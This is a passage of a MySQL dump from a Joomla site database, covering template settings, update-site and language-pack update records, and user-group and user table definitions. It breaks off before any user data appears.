Menu\",\"splitmenu-style\":\"vertical\",\"splitmenu-position\":\"sidebar-b\",\"offcanvas-startlevel\":\"1\",\"offcanvas-endlevel\":\"3\",\"responsive-enabled\":\"1\",\"layouts\":\"sidebara-content-sidebarb\",\"sidebar-a\":\"1:3\",\"sidebar-a-chrome\":\"sidebar-a:standard\",\"sidebar-b\":\"1:3\",\"sidebar-b-chrome\":\"sidebar-b:standard\",\"roof\":\"1:12,2:4,2:8,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"roof-chrome\":\"roof-1:standard,roof-2:standard,roof-3:standard,roof-4:standard,roof-5:standard,roof-6:standard\",\"top\":\"1:12,2:3,2:9,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"top-chrome\":\"top-1:standard,top-2:standard,top-3:standard,top-4:standard,top-5:standard,top-6:standard\",\"header\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"header-chrome\":\"header-1:standard,header-2:standard,header-3:standard,header-4:standard,header-5:standard,header-6:standard\",\"utility\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"utility-chrome\":\"utility-1:standard,utility-2:standard,utility-3:standard,utility-4:standard,utility-5:standard,utility-6:standard\",\"feature\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"feature-chrome\":\"feature-1:standard,feature-2:standard,feature-3:standard,feature-4:standard,feature-5:standard,feature-6:standard\",\"maintop\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"maintop-chrome\":\"maintop-1:standard,maintop-2:standard,maintop-3:standard,maintop-4:standard,maintop-5:standard,maintop-6:standard\",\"contenttop\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3\",\"contenttop-chrome\":\"contenttop-1:standard,contenttop-2:standard,contenttop-3:standard,contenttop-4:standard\",\"contentbottom\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3\",\"contentbottom-chrome\":\"contentbottom-1:standard,contentbottom-2:standard,contentbottom-3:standard,contentbottom-4:standard\",\"mainbottom\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"mainbottom-chrome\":\"mainbottom-1:standard,mainbottom-2:standard,mainbottom-3:standard,mainbottom-4:standard,mainbottom-5:standard,mainbottom-6:standard\",\"portfolio\":\"1:12\",\"portfolio-chrome\":\"portfolio:raw\",\"bottom\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"bottom-chrome\":\"bottom-1:standard,bottom-2:standard,bottom-3:standard,bottom-4:standard,bottom-5:standard,bottom-6:standard\",\"footer\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"footer-chrome\":\"footer-1:standard,footer-2:standard,footer-3:standard,footer-4:standard,footer-5:standard,footer-6:standard\",\"copyright\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"copyright-chrome\":\"copyright-1:standard,copyright-2:standard,copyright-3:standard,copyright-4:standard,copyright-5:standard,copyright-6:standard\",\"absolute\":\"1:12\",\"absolute-chrome\":\"absolute:raw\",\"breadcrumbs\":\"1:12\",\"breadcrumbs-chrome\":\"breadcrumbs:standard\",\"offcanvas\":\"1:12\",\"offcanvas-chrome\":\"offcanvas:raw\",\"webfonts-body-font\":\"0\",\"webfonts-body-selectors\":\"body\",\"webfonts-menu-font\":\"0\",\"webfonts-menu-selectors\":\"#menu a\",\"webfonts-heading-font\":\"0\",\"webfonts-heading-selectors\":\"h1,h3\",\"webfonts-module-font\":\"0\",\"webfonts-module-selectors\":\".title\",\"jquery-enabled\":\"1\",\"jquery-source\":\"local\",\"jquery-version\":\"1.8.3\",\"combined-css\":\"0\",\"minify-css\":\"0\",\"combined-js\":\"0\",\"minify-js\":\"0\",\"cache-time\":\"2400\",\"component-disable\":\"1\",\"component-disable-menu-ids\":\"435, 566, 571, 580, 581, 577, 578, 582\",\"rtl-support\":\"0\",\"remove-joomla-metainfo\":\"0\",\"disable-mootools\":\"0\",\"less-enabled\":\"1\",\"less-compression\":\"lessjs\",\"prevent-css-js\":\"\",\"custom-css\":\"\",\"custom-js\":\"\"}'),(125,'protostar',0,'0','protostar - Default','{\"templateColor\":\"\",\"logoFile\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}'),(126,'isis',1,'1','isis - Default','{\"templateColor\":\"\",\"logoFile\":\"\"}'),(127,'beez3',0,'0','beez3 - Default','{\"wrapperSmall\":53,\"wrapperLarge\":72,\"logo\":\"\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"bootstrap\":\"\",\"templatecolor\":\"nature\",\"headerImage\":\"\",\"backgroundcolor\":\"#eee\"}'); /*!40000 ALTER TABLE `fit_template_styles` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_ucm_base` -- DROP TABLE IF EXISTS `fit_ucm_base`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_ucm_base` ( `ucm_id` int(10) unsigned NOT NULL, `ucm_item_id` int(10) NOT NULL, `ucm_type_id` int(11) NOT NULL, `ucm_language_id` int(11) NOT NULL, PRIMARY KEY (`ucm_id`), KEY `idx_ucm_item_id` (`ucm_item_id`), KEY `idx_ucm_type_id` (`ucm_type_id`), KEY `idx_ucm_language_id` (`ucm_language_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_ucm_base` -- LOCK TABLES `fit_ucm_base` WRITE; /*!40000 ALTER TABLE `fit_ucm_base` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_ucm_base` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_ucm_content` -- DROP TABLE IF EXISTS `fit_ucm_content`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_ucm_content` ( `core_content_id` int(10) unsigned NOT NULL auto_increment, `core_type_alias` varchar(255) NOT NULL default '' COMMENT 'FK to the content types table', `core_title` varchar(255) NOT NULL, `core_alias` varchar(255) character set utf8 collate utf8_bin NOT NULL default '', `core_body` mediumtext NOT NULL, `core_state` tinyint(1) NOT NULL default '0', `core_checked_out_time` varchar(255) NOT NULL default '', `core_checked_out_user_id` int(10) unsigned NOT NULL default '0', `core_access` int(10) unsigned NOT NULL default '0', `core_params` text NOT NULL, `core_featured` tinyint(4) unsigned NOT NULL default '0', `core_metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.', `core_created_user_id` int(10) unsigned NOT NULL default '0', `core_created_by_alias` varchar(255) NOT NULL default '', `core_created_time` datetime NOT NULL default '0000-00-00 00:00:00', `core_modified_user_id` int(10) unsigned NOT NULL default '0' COMMENT 'Most recent user that modified', `core_modified_time` datetime NOT NULL default '0000-00-00 00:00:00', `core_language` char(7) NOT NULL, `core_publish_up` datetime NOT NULL, `core_publish_down` datetime NOT NULL, `core_content_item_id` int(10) unsigned default NULL COMMENT 'ID from the individual type table', `asset_id` int(10) unsigned default NULL COMMENT 'FK to the #__assets table.', `core_images` text NOT NULL, `core_urls` text NOT NULL, `core_hits` int(10) unsigned NOT NULL default '0', `core_version` int(10) unsigned NOT NULL default '1', `core_ordering` int(11) NOT NULL default '0', `core_metakey` text NOT NULL, `core_metadesc` text NOT NULL, `core_catid` int(10) unsigned NOT NULL default '0', `core_xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', `core_type_id` int(10) unsigned default NULL, PRIMARY KEY (`core_content_id`), KEY `tag_idx` (`core_state`,`core_access`), KEY `idx_access` (`core_access`), KEY `idx_alias` (`core_alias`), KEY `idx_language` (`core_language`), KEY `idx_title` (`core_title`), KEY `idx_modified_time` (`core_modified_time`), KEY `idx_created_time` (`core_created_time`), KEY `idx_content_type` (`core_type_alias`), KEY `idx_core_modified_user_id` (`core_modified_user_id`), KEY `idx_core_checked_out_user_id` (`core_checked_out_user_id`), KEY `idx_core_created_user_id` (`core_created_user_id`), KEY `idx_core_type_id` (`core_type_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Contains core content data in name spaced fields'; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_ucm_content` -- LOCK TABLES `fit_ucm_content` WRITE; /*!40000 ALTER TABLE `fit_ucm_content` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_ucm_content` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_ucm_history` -- DROP TABLE IF EXISTS `fit_ucm_history`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_ucm_history` ( `version_id` int(10) unsigned NOT NULL auto_increment, `ucm_item_id` int(10) unsigned NOT NULL, `ucm_type_id` int(10) unsigned NOT NULL, `version_note` varchar(255) NOT NULL default '' COMMENT 'Optional version name', `save_date` datetime NOT NULL default '0000-00-00 00:00:00', `editor_user_id` int(10) unsigned NOT NULL default '0', `character_count` int(10) unsigned NOT NULL default '0' COMMENT 'Number of characters in this version.', `sha1_hash` varchar(50) NOT NULL default '' COMMENT 'SHA1 hash of the version_data column.', `version_data` mediumtext NOT NULL COMMENT 'json-encoded string of version data', `keep_forever` tinyint(4) NOT NULL default '0' COMMENT '0=auto delete; 1=keep', PRIMARY KEY (`version_id`), KEY `idx_ucm_item_id` (`ucm_type_id`,`ucm_item_id`), KEY `idx_save_date` (`save_date`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_ucm_history` -- LOCK TABLES `fit_ucm_history` WRITE; /*!40000 ALTER TABLE `fit_ucm_history` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_ucm_history` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_update_sites` -- DROP TABLE IF EXISTS `fit_update_sites`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_update_sites` ( `update_site_id` int(11) NOT NULL auto_increment, `name` varchar(100) default '', `type` varchar(20) default '', `location` text NOT NULL, `enabled` int(11) default '0', `last_check_timestamp` bigint(20) default '0', `extra_query` varchar(1000) default '', PRIMARY KEY (`update_site_id`) ) ENGINE=InnoDB AUTO_INCREMENT=17 DEFAULT CHARSET=utf8 COMMENT='Update Sites'; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_update_sites` -- LOCK TABLES `fit_update_sites` WRITE; /*!40000 ALTER TABLE `fit_update_sites` DISABLE KEYS */; INSERT INTO `fit_update_sites` VALUES (1,'Joomla Core','collection','http://update.joomla.org/core/sts/list_sts.xml',1,1459662699,''),(2,'Joomla Extension Directory','collection','http://update.joomla.org/jed/list.xml',1,1459662699,''),(3,'Accredited Joomla! Translations','collection','http://update.joomla.org/language/translationlist_3.xml',1,1459662699,''),(8,'Xpert Tabs Update','extension','http://www.themexpert.com/ustreams/extensions/xperttabs.xml',1,1459662699,''),(12,'Expose Framework Update Site','extension','http://www.themexpert.com/ustreams/extensions/exposeframework.xml',1,1459662699,''),(13,'Expose Template Update','extension','http://www.themexpert.com/ustreams/templates/exposetemplate.xml',1,1459662699,''),(15,'','collection','http://update.joomla.org/core/list.xml',1,1459662699,''),(16,'WebInstaller Update Site','extension','http://appscdn.joomla.org/webapps/jedapps/webinstaller.xml',1,1459662699,''); /*!40000 ALTER TABLE `fit_update_sites` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_update_sites_extensions` -- DROP TABLE IF EXISTS `fit_update_sites_extensions`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_update_sites_extensions` ( `update_site_id` int(11) NOT NULL default '0', `extension_id` int(11) NOT NULL default '0', PRIMARY KEY (`update_site_id`,`extension_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Links extensions to update sites'; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_update_sites_extensions` -- LOCK TABLES `fit_update_sites_extensions` WRITE; /*!40000 ALTER TABLE `fit_update_sites_extensions` DISABLE KEYS */; INSERT INTO `fit_update_sites_extensions` VALUES (1,700),(2,700),(3,600),(3,10079),(8,10098),(12,10114),(13,10118),(15,700),(16,10140); /*!40000 ALTER TABLE `fit_update_sites_extensions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_updates` -- DROP TABLE IF EXISTS `fit_updates`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_updates` ( `update_id` int(11) NOT NULL auto_increment, `update_site_id` int(11) default '0', `extension_id` int(11) default '0', `name` varchar(100) default '', `description` text NOT NULL, `element` varchar(100) default '', `type` varchar(20) default '', `folder` varchar(20) default '', `client_id` tinyint(3) default '0', `version` varchar(32) default '', `data` text NOT NULL, `detailsurl` text NOT NULL, `infourl` text NOT NULL, `extra_query` varchar(1000) default '', PRIMARY KEY (`update_id`) ) ENGINE=InnoDB AUTO_INCREMENT=67 DEFAULT CHARSET=utf8 COMMENT='Available Updates'; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_updates` -- LOCK TABLES `fit_updates` WRITE; /*!40000 ALTER TABLE `fit_updates` DISABLE KEYS */; INSERT INTO `fit_updates` VALUES (1,1,700,'Joomla','','joomla','file','',0,'3.5.0','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2,3,0,'Armenian','','pkg_hy-AM','package','',0,'3.4.4.1','','http://update.joomla.org/language/details3/hy-AM_details.xml','',''),(3,3,0,'Malay','','pkg_ms-MY','package','',0,'3.4.1.2','','http://update.joomla.org/language/details3/ms-MY_details.xml','',''),(4,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6,3,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/zh-TW_details.xml','',''),(7,3,0,'French','','pkg_fr-FR','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8,3,0,'Galician','','pkg_gl-ES','package','',0,'3.3.1.2','','http://update.joomla.org/language/details3/gl-ES_details.xml','',''),(9,3,0,'German','','pkg_de-DE','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/de-DE_details.xml','',''),(10,3,0,'Greek','','pkg_el-GR','package','',0,'3.4.2.1','','http://update.joomla.org/language/details3/el-GR_details.xml','',''),(11,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12,3,0,'Hebrew','','pkg_he-IL','package','',0,'3.1.1.1','','http://update.joomla.org/language/details3/he-IL_details.xml','',''),(13,3,10079,'Hungarian','','pkg_hu-HU','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/hu-HU_details.xml','',''),(14,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.4.5.1','','http://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16,3,0,'Belarusian','','pkg_be-BY','package','',0,'3.2.1.1','','http://update.joomla.org/language/details3/be-BY_details.xml','',''),(17,3,0,'Bulgarian','','pkg_bg-BG','package','',0,'3.4.4.2','','http://update.joomla.org/language/details3/bg-BG_details.xml','',''),(18,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.4.1.1','','http://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.4.4.2','','http://update.joomla.org/language/details3/hr-HR_details.xml','',''),(21,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.4.1.1','','http://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22,3,0,'Danish','','pkg_da-DK','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/da-DK_details.xml','',''),(23,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24,3,0,'Estonian','','pkg_et-EE','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/et-EE_details.xml','',''),(25,3,0,'Italian','','pkg_it-IT','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/it-IT_details.xml','',''),(26,3,0,'Khmer','','pkg_km-KH','package','',0,'3.4.5.1','','http://update.joomla.org/language/details3/km-KH_details.xml','',''),(27,3,0,'Korean','','pkg_ko-KR','package','',0,'3.4.4.2','','http://update.joomla.org/language/details3/ko-KR_details.xml','',''),(28,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.4.3.1','','http://update.joomla.org/language/details3/lv-LV_details.xml','',''),(29,3,0,'Macedonian','','pkg_mk-MK','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/mk-MK_details.xml','',''),(30,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/nb-NO_details.xml','',''),(31,3,0,'Norwegian Nynorsk','','pkg_nn-NO','package','',0,'3.4.2.1','','http://update.joomla.org/language/details3/nn-NO_details.xml','',''),(32,3,0,'Persian','','pkg_fa-IR','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/fa-IR_details.xml','',''),(33,3,0,'Polish','','pkg_pl-PL','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/pl-PL_details.xml','',''),(34,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.4.5.1','','http://update.joomla.org/language/details3/pt-PT_details.xml','',''),(35,3,0,'Russian','','pkg_ru-RU','package','',0,'3.5.0.6','','http://update.joomla.org/language/details3/ru-RU_details.xml','',''),(36,3,0,'English AU','','pkg_en-AU','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/en-AU_details.xml','',''),(37,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.5.0.2','','http://update.joomla.org/language/details3/sk-SK_details.xml','',''),(38,3,0,'English US','','pkg_en-US','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/en-US_details.xml','',''),(39,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.5.0.2','','http://update.joomla.org/language/details3/sv-SE_details.xml','',''),(40,3,0,'Syriac','','pkg_sy-IQ','package','',0,'3.4.5.1','','http://update.joomla.org/language/details3/sy-IQ_details.xml','',''),(41,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.5.0.2','','http://update.joomla.org/language/details3/ta-IN_details.xml','',''),(42,3,0,'Thai','','pkg_th-TH','package','',0,'3.4.8.1','','http://update.joomla.org/language/details3/th-TH_details.xml','',''),(43,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/tr-TR_details.xml','',''),(44,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.5.0.2','','http://update.joomla.org/language/details3/uk-UA_details.xml','',''),(45,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.3.0.1','','http://update.joomla.org/language/details3/ug-CN_details.xml','',''),(46,3,0,'Albanian','','pkg_sq-AL','package','',0,'3.1.1.1','','http://update.joomla.org/language/details3/sq-AL_details.xml','',''),(47,3,0,'Hindi','','pkg_hi-IN','package','',0,'3.3.6.1','','http://update.joomla.org/language/details3/hi-IN_details.xml','',''),(48,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/pt-BR_details.xml','',''),(49,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/sr-YU_details.xml','',''),(50,3,0,'Spanish','','pkg_es-ES','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/es-ES_details.xml','',''),(51,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.4.8.1','','http://update.joomla.org/language/details3/bs-BA_details.xml','',''),(52,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/sr-RS_details.xml','',''),(53,3,0,'Vietnamese','','pkg_vi-VN','package','',0,'3.2.1.1','','http://update.joomla.org/language/details3/vi-VN_details.xml','',''),(54,3,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'3.3.0.2','','http://update.joomla.org/language/details3/id-ID_details.xml','',''),(55,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.4.2.1','','http://update.joomla.org/language/details3/fi-FI_details.xml','',''),(56,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/sw-KE_details.xml','',''),(57,3,0,'Montenegrin','','pkg_srp-ME','package','',0,'3.3.1.1','','http://update.joomla.org/language/details3/srp-ME_details.xml','',''),(58,3,0,'English CA','','pkg_en-CA','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/en-CA_details.xml','',''),(59,3,0,'French CA','','pkg_fr-CA','package','',0,'3.4.4.3','','http://update.joomla.org/language/details3/fr-CA_details.xml','',''),(60,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.3.0.2','','http://update.joomla.org/language/details3/cy-GB_details.xml','',''),(61,3,0,'Sinhala','','pkg_si-LK','package','',0,'3.3.1.1','','http://update.joomla.org/language/details3/si-LK_details.xml','',''),(62,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.1','','http://update.joomla.org/language/details3/prs-AF_details.xml','',''),(63,3,0,'Turkmen','','pkg_tk-TM','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/tk-TM_details.xml','',''),(64,3,0,'Irish','','pkg_ga-IE','package','',0,'3.5.0.2','','http://update.joomla.org/language/details3/ga-IE_details.xml','',''),(65,3,0,'Dzongkha','','pkg_dz-BT','package','',0,'3.4.5.1','','http://update.joomla.org/language/details3/dz-BT_details.xml','',''),(66,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.5.0.1','','http://update.joomla.org/language/details3/sl-SI_details.xml','',''); /*!40000 ALTER TABLE `fit_updates` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_user_keys` -- DROP TABLE IF EXISTS `fit_user_keys`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_user_keys` ( `id` int(10) unsigned NOT NULL auto_increment, `user_id` varchar(255) NOT NULL, `token` varchar(255) NOT NULL, `series` varchar(255) NOT NULL, `invalid` tinyint(4) NOT NULL, `time` varchar(200) NOT NULL, `uastring` varchar(255) NOT NULL, PRIMARY KEY (`id`), UNIQUE KEY `series` (`series`), UNIQUE KEY `series_2` (`series`), UNIQUE KEY `series_3` (`series`), KEY `user_id` (`user_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_user_keys` -- LOCK TABLES `fit_user_keys` WRITE; /*!40000 ALTER TABLE `fit_user_keys` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_user_keys` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_user_notes` -- DROP TABLE IF EXISTS `fit_user_notes`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_user_notes` ( `id` int(10) unsigned NOT NULL auto_increment, `user_id` int(10) unsigned NOT NULL default '0', `catid` int(10) unsigned NOT NULL default '0', `subject` varchar(100) NOT NULL default '', `body` text NOT NULL, `state` tinyint(3) NOT NULL default '0', `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `created_user_id` int(10) unsigned NOT NULL default '0', `created_time` datetime NOT NULL default '0000-00-00 00:00:00', `modified_user_id` int(10) unsigned NOT NULL, `modified_time` datetime NOT NULL default '0000-00-00 00:00:00', `review_time` datetime NOT NULL default '0000-00-00 00:00:00', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (`id`), KEY `idx_user_id` (`user_id`), KEY `idx_category_id` (`catid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_user_notes` -- LOCK TABLES `fit_user_notes` WRITE; /*!40000 ALTER TABLE `fit_user_notes` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_user_notes` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_user_profiles` -- DROP TABLE IF EXISTS `fit_user_profiles`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_user_profiles` ( `user_id` int(11) NOT NULL, `profile_key` varchar(100) NOT NULL, `profile_value` varchar(255) NOT NULL, `ordering` int(11) NOT NULL default '0', UNIQUE KEY `idx_user_id_profile_key` (`user_id`,`profile_key`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Simple user profile storage table'; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_user_profiles` -- LOCK TABLES `fit_user_profiles` WRITE; /*!40000 ALTER TABLE `fit_user_profiles` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_user_profiles` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_user_usergroup_map` -- DROP TABLE IF EXISTS `fit_user_usergroup_map`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_user_usergroup_map` ( `user_id` int(10) unsigned NOT NULL default '0' COMMENT 'Foreign Key to #__users.id', `group_id` int(10) unsigned NOT NULL default '0' COMMENT 'Foreign Key to #__usergroups.id', PRIMARY KEY (`user_id`,`group_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_user_usergroup_map` -- LOCK TABLES `fit_user_usergroup_map` WRITE; /*!40000 ALTER TABLE `fit_user_usergroup_map` DISABLE KEYS */; INSERT INTO `fit_user_usergroup_map` VALUES (736,8),(737,2),(738,2),(739,2),(740,2),(741,2),(742,2),(743,2),(744,2),(745,2),(746,2),(747,2),(748,2),(749,2),(750,2),(751,2),(752,2),(753,2),(754,2),(755,2),(756,2),(757,2),(758,2),(759,2); /*!40000 ALTER TABLE `fit_user_usergroup_map` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_usergroups` -- DROP TABLE IF EXISTS `fit_usergroups`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_usergroups` ( `id` int(10) unsigned NOT NULL auto_increment COMMENT 'Primary Key', `parent_id` int(10) unsigned NOT NULL default '0' COMMENT 'Adjacency List Reference Id', `lft` int(11) NOT NULL default '0' COMMENT 'Nested set lft.', `rgt` int(11) NOT NULL default '0' COMMENT 'Nested set rgt.', `title` varchar(100) NOT NULL default '', PRIMARY KEY (`id`), UNIQUE KEY `idx_usergroup_parent_title_lookup` (`parent_id`,`title`), KEY `idx_usergroup_title_lookup` (`title`), KEY `idx_usergroup_adjacency_lookup` (`parent_id`), KEY `idx_usergroup_nested_set_lookup` USING BTREE (`lft`,`rgt`) ) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_usergroups` -- LOCK TABLES `fit_usergroups` WRITE; /*!40000 ALTER TABLE `fit_usergroups` DISABLE KEYS */; INSERT INTO `fit_usergroups` VALUES (1,0,1,18,'Public'),(2,1,8,15,'Registered'),(3,2,9,14,'Author'),(4,3,10,13,'Editor'),(5,4,11,12,'Publisher'),(6,1,4,7,'Manager'),(7,6,5,6,'Administrator'),(8,1,16,17,'Super Users'),(9,1,2,3,'Guest'); /*!40000 ALTER TABLE `fit_usergroups` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_users` -- DROP TABLE IF EXISTS `fit_users`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_users` ( `id` int(11) NOT NULL auto_increment, `name` varchar(255) NOT NULL default '', `username` varchar(150) NOT NULL default '', `email` varchar(100) NOT NULL default '', `password` varchar(100) NOT NULL default '', `block` tinyint(4) NOT NULL default '0', `sendEmail` tinyint(4) default '0', `registerDate` datetime NOT NULL default '0000-00-00 00:00:00', `lastvisitDate` datetime NOT NULL default '0000-00-00 00:00:00', `activation` varchar(100) NOT NULL default '', `params` text NOT NULL, `lastResetTime` datetime NOT NULL default '0000-00-00 00:00:00' COMMENT 'Date of last password reset', `resetCount` int(11) NOT NULL default '0' COMMENT 'Count of password resets since lastResetTime', `otpKey` varchar(1000) NOT NULL default '' COMMENT 'Two factor authentication 